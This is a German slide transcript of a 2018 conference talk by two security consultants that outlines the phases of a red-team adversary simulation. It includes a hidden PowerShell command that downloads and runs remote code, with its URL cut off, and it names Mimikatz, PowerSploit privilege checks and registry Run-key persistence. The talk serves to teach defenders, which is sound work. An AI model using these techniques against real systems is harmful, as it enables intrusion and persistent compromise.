Andreas Tomek & Severin Winkler. Adversary Simulation 2018 Ein Einblick in die Red Teaming Praxis

Transkript

1 Andreas Tomek & Severin Winkler Adversary Simulation 2018 Ein Einblick in die Red Teaming Praxis 16. Sicherheitskonferenz Krems

2 16. Sicherheitskonferenz Krems

3 [~]$ whoami Skills & Experience Information security projects in all major industries Cyber Security Management Consulting Andreas Tomek CISSP, CISA, CPTS, CPTE, AMBCI Managed Cyber Security Cyber Startups 16. Sicherheitskonferenz Krems

4 [~]$ whoami Skills & Experience Senior Security Advisor with technical and dev background Security Assessments, Security Strategy and Target Operating Model (TOM), Incident Response, Trainings, Severin Winkler Industry, Retail, Start-Ups, Financial, Government, CISSP, CSSLP, OSCP, GLNA, CEH, 16. Sicherheitskonferenz Krems

5 Schematische Vorgangsweise gezielter Angriffe Unternehmensnetzwerk 1 Reconnaissance 5 7 Persistence 6 2 Delivery & 3 Initial Foothold 4 Privilege Escalation 16. Sicherheitskonferenz Krems

6 PHASE 2 - Delivery 16. Sicherheitskonferenz Krems

7 PHASE 3 Initial Foothold Delivery (Phishing), Web (Drive-By), USB-Sticks Execution Windows Executable Office Macro VBScript HTML-Application Powershell >> Klassische Schadsoftware >> Eingebaute Funktionalität >> Eingebaute Funktionalität >> Eingebaute Funktionalität >> Eingebaute Funktionalität 16. Sicherheitskonferenz Krems

8 PHASE 3 Initial Foothold Java signed applet attack Office Macro Mediale Aufmerksamkeit seit 2015 Alte Dateitypen wie zb. *.wri Powershell powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(' HTML Application *.hta Windows Dropper *.exe, *.scr 16. Sicherheitskonferenz Krems

9 PHASE 3 Initial Foothold Verwendung vorhandener Protokolle für C&C Kanal HTTP(S) DNS DNS A => 4 Bytes pro Request DNS TXT => 189 Bytes pro Request SMB-Pipes 16. Sicherheitskonferenz Krems

10 PHASE 4 Privilege Escalation > Windows Services > Scheduled Tasks > Umgehung von UAC > Mimikatz > Group Policy Preferences (GGP) > Wiederverwendung von Zugangsdaten > > PS:>Invoke-AllChecks #PowerSploit > windows-privesc-check2.exe 16. Sicherheitskonferenz Krems

11 PHASE 5 Interne Reconnaissance Analyse von Hosts + Vertrauensbeziehungen Admin Hunting 16. Sicherheitskonferenz Krems

12 PHASE 6 Lateral Movement 16. Sicherheitskonferenz Krems

13 PHASE 6 Lateral Movement 16. Sicherheitskonferenz Krems

14 PHASE 6 Lateral Movement 16. Sicherheitskonferenz Krems

15 PHASE 7 Persistence Überlebe den Reboot Auflösung des Payloads beim Login HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run Scheduled Tasks Windows Services WMI Subskription 16. Sicherheitskonferenz Krems

16 PHASE 7 Persistence 16. Sicherheitskonferenz Krems

17 Wrap Up Approach Reconnaissance Delivery & Initial Foothold Privilege Escalation Internal Reconnaissance Lateral Movement Persistence Die jüngsten Ereignisse im Bereich der Informationssicherheit haben gezeigt, dass Sicherheitsvorfälle erhebliche Auswirkungen auf ein Unternehmen haben können. In einem Red Teaming Projekt durchläuft ein Unternehmen eine realistische Simulation von Cyberangriffen. 16. Sicherheitskonferenz Krems

18 DEMO GIT CLONE Sicherheitskonferenz Krems

19 Any open Questions? 16. Sicherheitskonferenz Krems

20 Referenzen PowerSploit Empire Cobalt Strike Nishang Veil Framework Persistence options with Empire Sicherheitskonferenz Krems

21 Referenzen Raytheon Symantec Wikipedia ycle.jpg 16. Sicherheitskonferenz Krems

22 Kontaktdaten Andreas Tomek Partner Cyber Security KPMG Advisory GmbH Porzellangasse Wien Severin Winkler Manager Cyber Security KPMG Advisory GmbH Porzellangasse Wien 16. Sicherheitskonferenz Krems